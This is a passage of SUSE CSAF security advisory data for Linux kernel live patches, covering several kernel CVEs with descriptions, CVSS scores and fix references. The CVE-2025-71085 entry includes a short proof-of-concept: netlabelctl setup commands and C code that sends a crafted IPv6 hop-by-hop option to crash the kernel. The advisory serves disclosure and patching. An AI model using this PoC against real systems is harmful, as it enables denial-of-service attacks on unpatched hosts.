"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1101-1
Vulnerability from csaf_suse - Published: 2026-03-27 01:33 - Updated: 2026-03-27 01:33Summary
Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.3 fixes various security issues
The following security issues were fixed:
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1101,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1101
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.3 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1101,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1101",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1101-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1101-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261101-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1101-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025011.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T01:33:43Z",
"generator": {
"date": "2026-03-27T01:33:43Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1101-1",
"initial_release_date": "2026-03-27T01:33:43Z",
"revision_history": [
{
"date": "2026-03-27T01:33:43Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 